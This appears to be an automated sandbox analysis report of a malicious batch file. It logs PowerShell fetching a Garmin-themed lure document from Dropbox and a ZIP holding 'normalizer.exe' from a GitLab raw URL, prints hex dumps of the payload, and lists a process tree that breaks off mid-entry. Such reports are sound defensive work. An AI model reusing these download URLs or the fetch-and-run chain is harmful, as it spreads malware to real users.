                                                                                                                                                                                                                      Dec 17, 2024 19:44:02.928675890 CET1.1.1.1192.168.2.40x9fc7No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Dec 17, 2024 19:44:06.978022099 CET1.1.1.1192.168.2.40x46f0No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      0192.168.2.449730162.125.69.184436024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-12-17 18:44:01 UTC191OUTGET /scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1 HTTP/1.1
                                                                                                                                                                                                                      Host: www.dropbox.com
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      2024-12-17 18:44:02 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                      Content-Security-Policy: media-src https://* blob: ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'un [TRUNCATED]
                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                      Location: https://uc72b79eecbd8d8d5c117c6d9951.dl.dropboxusercontent.com/cd/0/get/Cgf_M__sO2v5p-OouMPp6PUPdVW_8XOOFmyHIw3_y8VAHzG9jFbdcNbrkdl1NXLPfXELTBoBgZQWYP-CrMhG9S1q_XB1jhi3YqCIUy-4PtTgSbRfriTB0QGI0FK14HyTujZyvMDzJbJmvpqCkax0mPZf/file?dl=1#
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                      Set-Cookie: gvc=MzE3MDQ4MzY1MTk5NzY5NzYxNzgzNDMzMTY3MDI5ODU0MzA2MTk3; Path=/; Expires=Sun, 16 Dec 2029 18:44:01 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                      Set-Cookie: t=EMeH_fGbv4KjSBiAGgIJFwtA; Path=/; Domain=dropbox.com; Expires=Wed, 17 Dec 2025 18:44:01 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                      Set-Cookie: __Host-js_csrf=EMeH_fGbv4KjSBiAGgIJFwtA; Path=/; Expires=Wed, 17 Dec 2025 18:44:01 GMT; Secure; SameSite=None
                                                                                                                                                                                                                      Set-Cookie: __Host-ss=iHMsCpQTEE; Path=/; Expires=Wed, 17 Dec 2025 18:44:01 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                      Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 16 Dec 2029 18:44:01 GMT
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                      Content-Length: 17
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 18:44:02 GMT
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                      Server: envoy
                                                                                                                                                                                                                      Cache-Control: no-cache, no-store
                                                                                                                                                                                                                      X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                      X-Dropbox-Request-Id: ed829d756bb74e5b879168f5893bc325
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      2024-12-17 18:44:02 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                      Data Ascii: ...status=302-->


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      1192.168.2.449731172.65.251.784435064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC91OUTGET /fgsd1/gg/-/raw/main/FGa1312.zip HTTP/1.1
                                                                                                                                                                                                                      Host: gitlab.com
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC445INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 18:44:08 GMT
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      Content-Length: 68976508
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      CF-Ray: 8f3910111f4c43e6-EWR
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                                      Content-Disposition: attachment
                                                                                                                                                                                                                      ETag: "14c0f89585e7d9716bb6ea8f0ba9a5b5"
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC2131INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                      Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC500INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 76 50 53 76 77 71 79 38 37 7a 4b 38 25 32 46 66 25 32 42 74 6c 70 75 64 66 49 33 7a 56 25 32 42 71 37 4b 49 62 6e 42 45 4b 79 78 31 64 6d 4a 65 67 41 6e 75 78 62 7a 71 34 75 4c 62 7a 76 5a 63 49 62 78 47 6b 34 78 48 6f 31 6c 71 79 35 41 57 5a 37 32 43 52 58 49 67 63 45 30 31 56 56 35 46 6c 4b 4e 74 42 61 70 4a 43 74 30 35 6c 4f 4f 4a 41 78 63 66 77 4c 6d 42 69 6a 61 6e 4c 58 41 49 4d 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20
                                                                                                                                                                                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vPSvwqy87zK8%2Ff%2BtlpudfI3zV%2Bq7KIbnBEKyx1dmJegAnuxbzq4uLbzvZcIbxGk4xHo1lqy5AWZ72CRXIgcE01VV5FlKNtBapJCt05lOOJAxcfwLmBijanLXAIM%3D"}],"group":"cf-nel","max_age":604800}NEL:
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC1369INData Raw: 50 4b 03 04 0a 00 00 00 00 00 e7 2c 89 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 53 63 72 69 70 74 73 2f 50 4b 03 04 14 00 00 00 08 00 c8 3d 56 58 30 70 28 4b 74 cd 00 00 9c a7 01 00 16 00 00 00 53 63 72 69 70 74 73 2f 6e 6f 72 6d 61 6c 69 7a 65 72 2e 65 78 65 ec bd 09 60 93 55 d6 30 fc 64 6b d3 8d 27 05 02 65 93 00 05 0a 05 2c 14 b5 35 a0 09 4d e4 09 a4 52 36 a9 0a da d2 05 d0 42 3b ed 13 16 05 6c 4d 3b d3 f0 18 45 47 1d 67 c6 51 c6 65 c4 d1 99 71 d4 61 53 b1 a5 d0 05 0a 14 54 2c e0 52 c5 e5 89 01 2c 2e 6d d9 fa fc e7 dc 7b 93 a6 a5 a8 ef bc df fb 7d ff f7 7e 6f da e4 dc 7d bf e7 9e 73 ef 3d e7 a6 df b1 99 d3 70 1c a7 85 af a2 70 dc 0e 8e 7e 2c dc cf 7f 3a e0 db 67 f8 ae 3e dc 9b 11 07 47 ec 50 39 0f 8e 58 b0 7c 45 89 a9 a8 b8 70 59 71 f6 4a 53
                                                                                                                                                                                                                      Data Ascii: PK,YScripts/PK=VX0p(KtScripts/normalizer.exe`U0dk'e,5MR6B;lM;EGgQeqaST,R,.m{}~o}s=pp~,:g>GP9X|EpYqJS
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC1369INData Raw: 98 63 a0 ec c5 00 ad 3b 37 43 aa bb 22 c8 d4 be 1d ca b0 83 e4 e2 de 9b 80 69 59 e6 e3 d4 16 a4 e3 8a f1 1d 52 3e 71 94 bb 43 ed d2 b5 d5 68 5c 83 68 48 e9 80 4d aa 92 9a 70 b2 de 29 28 a3 c7 84 24 61 ba 13 d3 d8 c3 71 b4 fd 17 b1 b4 04 6f 8c ac 28 8a dc 6f 08 89 2e 48 1d f2 43 83 30 f1 b5 d1 52 bd 3c ce 84 ae cd 7e ad e0 3e 00 3d 75 58 3e 4d 86 7b 37 94 d0 28 48 80 ce 32 01 2b 2c 37 08 9e 22 40 0c 6b 4d 14 2d 60 16 72 5f 03 c6 a8 97 7f ad e0 5c ec 90 d5 68 f7 0a 49 b2 8b 38 34 cb e7 78 e2 90 25 e7 12 07 59 70 2b 8a d8 57 30 5f e4 cb 67 42 d9 05 73 07 5f 7e 13 1a dc 17 89 fb a7 7c f9 b5 c4 bd 99 2f 1f 43 dc 3b 88 7b 1d 5f 3e 90 b8 d7 f0 e5 7d c0 b0 b3 0d d2 53 8c f7 7d 03 c6 1f c1 e4 94 64 c5 58 80 b6 1f 88 ad 45 31 de f5 0d 96 ad 55 5e c5 d3 32 7e 03 13
                                                                                                                                                                                                                      Data Ascii: c;7C"iYR>qCh\hHMp)($aqo(o.HC0R<~>=uX>M{7(H2+,7"@kM-`r_\hI84x%Yp+W0_gBs_~|/C;{_>}S}dXE1U^2~
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC1369INData Raw: 13 21 35 89 d8 79 d6 29 cc 67 fa f3 e0 28 35 89 90 d6 75 4f 81 d1 1f 05 86 47 c1 20 b8 bf 81 66 f5 16 01 5f 99 6f f5 4c bd ad 56 b7 f6 7a 15 97 21 f7 83 56 03 94 e7 35 7e a3 09 25 08 4d df e3 b8 72 63 e2 82 d4 89 04 83 b9 b9 64 60 69 6a 8c c8 97 a6 46 8a 91 82 52 2d 98 eb 8b cf fa 35 30 0f 20 7e 05 62 c0 77 35 74 35 38 f5 9d a2 58 2a 6f 40 14 97 91 78 d1 29 d5 40 4d 76 fa 2e 23 a6 3a 0c 78 2d 81 a4 8a bc 8f 62 7c e1 73 a0 85 0f 11 56 e1 9f 58 80 9c 0e 4c e0 39 48 20 df 23 ae cf 10 80 ee cf c8 4f 85 ee 10 61 88 43 27 be 2f af 32 90 e6 88 c0 b1 92 9f 7a 83 4b 86 b1 35 8a d4 60 8b 86 f2 1a b9 10 db cf b3 d6 bb d9 10 e8 f0 3a e8 f0 70 d2 e1 10 63 04 89 f1 0c 8b 31 25 34 46 4c 2f 31 10 67 58 10 8f 01 32 b0 c8 9f 5e 64 6d f6 a4 86 8d f5 16 42 ff 9f 43 72 63 7d
                                                                                                                                                                                                                      Data Ascii: !5y)g(5uOG f_oLVz!V5~%Mrcd`ijFR-50 ~bw5t58X*o@x)@Mv.#:x-b|sVXL9H #OaC'/2zK5`:pc1%4FL/1gX2^dmBCrc}
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC1369INData Raw: 08 a3 b0 0f 22 9b 11 b3 c8 1a 18 e3 7f 45 ee 8c c7 2a 23 a6 92 bf 0f 1a 05 a9 d6 df 57 be e8 00 c7 4f 82 8e c9 55 74 bb 80 6c 27 06 f6 0c bc ba ec c1 2a ae 86 ce 09 49 f7 f8 9d 2a ee ad fe 94 36 0d df 81 1b dc 7e 9d b9 86 77 d6 08 39 f5 bb 90 88 f6 e8 7e 05 41 e4 84 74 1c d4 3a fb 6c b2 8a b8 e2 bd 19 30 be 0f 78 86 2d 40 cf 28 ea 99 c0 3c c3 77 0c 46 0c bb 9a 30 91 df 0f 02 47 4f 7f 95 e0 de 93 04 98 4b 2f 28 07 80 56 90 74 17 81 33 f0 7f 85 08 05 d6 26 08 63 f7 0a 1a 87 54 ef f4 1a ff 2c a8 80 61 af 12 aa 3b 74 ee cf 86 3b 24 ed 1e e1 de 86 4c a7 d4 5f e5 70 5f 50 80 2a 77 5f 00 26 3f 1d e6 71 58 9d 1a fa 43 71 28 55 98 ba 43 69 70 bd 93 5c 45 a7 14 59 a7 96 65 70 5c e9 f4 cc 64 e8 13 51 27 9f 4f 27 ad fd 20 32 5a d0 85 be 6c a0 1a ba 70 03 90 02 02 16
                                                                                                                                                                                                                      Data Ascii: "E*#WOUtl'*I*6~w9~At:l0x-@(<wF0GOK/(Vt3&cT,a;t;$L_p_P*w_&?qXCq(UCip\EYep\dQ'O' 2Zlp
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC1369INData Raw: b7 85 d0 ee 71 72 e7 d0 60 59 b7 6b 08 ed ee fb 94 2e f6 41 3e c8 e9 cd 8d cf 92 47 60 f9 db 66 c6 59 f8 8a 5f b3 6d 9b f1 2a da 63 e3 dd 1d 9d e2 68 21 a7 89 ac 1a e7 75 c0 f1 26 5a 55 9c fb f3 e1 c2 bd 47 33 1d 9a fe f5 b0 1c 46 8c 80 15 3a 16 0c dc 08 dc 5d 03 16 54 17 06 81 da 66 a4 3c e0 1a 8d a9 0c c6 54 8c 40 28 08 52 35 5b ad 71 a5 76 68 a2 ab da ac 29 a5 62 3f 79 5e 57 59 a3 b0 ac 87 14 98 b0 e3 b1 24 96 61 88 b9 d2 a5 46 c6 52 64 a2 e3 f3 8b bb 58 8a ef 87 31 96 e2 3b 44 61 c8 52 24 e0 3c 46 62 39 1f da 52 4f d6 d4 1d 78 b5 84 df 7e 22 df 5c ef 42 86 c9 be 03 51 26 d8 4a 0c b0 32 71 f1 c0 ee 6f 6f e0 b7 6b 05 ff 18 b2 01 e7 04 8c 66 41 72 35 c9 26 55 2b c6 39 47 71 ab 06 5a 4c c7 6f 07 0f 7e 7b 35 bf fd c0 a8 ea 00 51 4e da 9f 30 6e 9b 86 04 eb
                                                                                                                                                                                                                      Data Ascii: qr`Yk.A>G`fY_m*ch!u&ZUG3F:]Tf<T@(R5[qvh)b?y^WY$aFRdX1;DaR$<Fb9ROx~"\BQ&J2qookfAr5&U+9GqZLo~{5QN0n
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC1369INData Raw: a6 7a e7 44 c8 9f ce 80 35 9e da 07 c3 ba 91 6c d8 b5 85 c7 fd 75 1e 9a a2 bd 79 c8 d1 51 17 14 5b 72 f4 ce 48 cc fd 0d 2b 8c 7e 45 e4 67 4b d1 5f 41 d8 41 06 c5 58 ba 1f 86 7c 5d c8 1e 07 ee f5 23 e5 25 d0 21 4d fa 91 d4 f8 d6 94 de 6a 0c c9 18 0c b0 04 58 f6 73 5c d7 7e 0e f2 5a 71 41 5c 05 23 e2 90 62 93 be b2 27 9f f1 de 15 0d 23 3b cd 4a f7 4a 00 df 6c 43 7c 73 40 1e 84 b5 48 56 60 d6 7d 7d 83 8a 83 d8 f1 6e c5 c2 7b 25 15 f2 ac ed b3 a4 a1 ad 84 25 38 c7 d1 5c 92 70 5e 0a 3a 2e 8a 5e a5 70 37 80 7b 5b 9a 5e c5 57 bc 42 70 0a 34 c6 34 5a e5 2a 2b 36 0f 3a 8c 10 bc b3 03 8d f3 5d 03 29 40 94 cd bb 5c 65 83 01 9a e0 d7 28 69 ac 91 1e b6 00 09 5f 71 c6 95 8b e1 15 e3 dd 0d 34 69 31 9a da 17 81 dd 2f 60 8d 30 d0 cd b5 e0 25 78 92 01 61 4e 82 82 cf 4e 84
                                                                                                                                                                                                                      Data Ascii: zD5luyQ[rH+~EgK_AAX|]#%!MjXs\~ZqA\#b'#;JJlC|s@HV`}}n{%%8\p^:.^p7{[^WBp44Z*+6:])@\e(i_q4i1/`0%xaNN
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC1369INData Raw: 3a 35 3e 01 f6 15 1a 61 be 8a 8c 19 1d 24 e3 07 84 3c 1b 77 0c c4 48 59 7b 0a a7 71 4e 02 e7 ce 89 0b 12 29 b4 ab 7b a1 b1 21 72 c8 e4 e8 2f 0f ee 2a 07 de 55 00 3c 3d 06 ca 61 11 c3 dc d9 71 9c bf 55 be e5 6b 46 71 5f a7 04 28 ee 03 e0 e4 3f 16 42 71 37 86 f2 d0 39 e7 61 de bc 4f 2e 1b 75 28 e2 ed 82 a4 33 5f ab e2 76 62 9f bb 15 c0 14 96 f2 1d 78 fa e9 8a 34 9f 77 0d 6b b3 64 a9 c4 81 f2 8b 10 7c 27 bd dd da 2c 3f 85 71 cd 35 e2 35 90 ce 43 68 96 ea 15 63 5d 15 bd 91 a4 18 9f a8 22 1b d1 6a 18 99 87 e5 aa 1f 70 88 7d 4a af 99 e9 ac 48 00 7a 8d 07 26 e1 1c 8c de 9f 7e ef c9 cc 19 b5 b6 41 7a 0e 26 15 12 54 ab 22 29 ee 0a ce 8a 20 bf 10 87 4d c4 36 c2 90 ae 74 5f ec 04 8c 7c 4d 24 a5 4c db 22 02 94 29 b9 08 00 64 6e 9e 79 98 03 72 29 59 82 17 df a4 ef 91
                                                                                                                                                                                                                      Data Ascii: :5>a$<wHY{qN){!r/*U<=aqUkFq_(?Bq79aO.u(3_vbx4wkd|',?q55Chc]"jp}JHz&~Az&T") M6t_|M$L")dnyr)Y
                                                                                                                                                                                                                      2024-12-17 18:44:08 UTC1369INData Raw: 38 ab 5d ab dd 5f 77 ba bf ba e4 3e ac e6 77 9d 0d f7 17 41 42 ae a5 90 88 35 4a f1 e7 b8 7d 0b c4 39 6e 5f 1f 71 1a 64 39 1e f3 1e e8 3e 1f c6 57 0c 86 31 d2 5e c7 c1 d2 e9 ba 1e 72 e9 e3 4f b5 43 6f 27 da a5 7a 7e 57 5b 1f 7f 22 da 86 11 db d9 3e fe 61 2c 64 34 84 e4 fd 3c bf eb eb e8 12 9d 55 3a e6 d7 82 43 c8 f5 59 be 42 0b c9 da 71 c7 61 37 92 3b da ae 96 16 bc 31 fb de 02 fe 77 87 86 8c fd f7 e4 3f fe 8a ec 28 56 3c 4a 78 8e 9a b0 d0 c0 f9 6e f3 74 be 62 0d f5 09 26 60 7c 88 24 a0 a3 32 2f f2 5d 1f 21 93 4d 7a 33 12 8a d1 d7 7f 2b 04 59 47 82 e8 59 10 73 57 10 03 04 89 f5 27 e2 fd 48 12 24 9c 05 89 23 41 f8 8a 48 9a 59 1f 08 66 e8 56 14 5b 6a 32 5f 41 a5 b9 9c 78 d4 d9 08 2c 09 cc 54 bc 92 5f 8a db c5 cf 16 d1 7a 1c 87 20 8a ce 1a 05 13 1a d0 a1 c7
                                                                                                                                                                                                                      Data Ascii: 8]_w>wAB5J}9n_qd9>W1^rOCo'z~W[">a,d4<U:CYBqa7;1w?(V<Jxntb&`|$2/]!Mz3+YGYsW'H$#AHYfV[j2_Ax,T_z


                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                      Start time:13:43:56
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngarm13de02.bat" "
                                                                                                                                                                                                                      Imagebase:0x7ff696020000
                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                      Start time:13:43:56
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                      Start time:13:43:56
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:chcp.com 437
                                                                                                                                                                                                                      Imagebase:0x7ff6c3410000
                                                                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                      Start time:13:43:57
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:find
                                                                                                                                                                                                                      Imagebase:0x7ff7fd9e0000
                                                                                                                                                                                                                      File size:17'920 bytes
                                                                                                                                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                      Start time:13:43:57
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:findstr /L /I set "C:\Users\user\Desktop\hngarm13de02.bat"
                                                                                                                                                                                                                      Imagebase:0x7ff7b71a0000
                                                                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                      Start time:13:43:57
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:findstr /L /I goto "C:\Users\user\Desktop\hngarm13de02.bat"
                                                                                                                                                                                                                      Imagebase:0x7ff7b71a0000
                                                                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                      Start time:13:43:57
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:findstr /L /I echo "C:\Users\user\Desktop\hngarm13de02.bat"
                                                                                                                                                                                                                      Imagebase:0x7ff7b71a0000
                                                                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                      Start time:13:43:57
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:findstr /L /I pause "C:\Users\user\Desktop\hngarm13de02.bat"
                                                                                                                                                                                                                      Imagebase:0x7ff7b71a0000
                                                                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                      Start time:13:43:57
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:fInd
                                                                                                                                                                                                                      Imagebase:0xae0000
                                                                                                                                                                                                                      File size:17'920 bytes
                                                                                                                                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                      Start time:13:43:57
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                      Imagebase:0x7ff696020000
                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                      Start time:13:43:57
                                                                                                                                                                                                                      Start date:17/12/2024
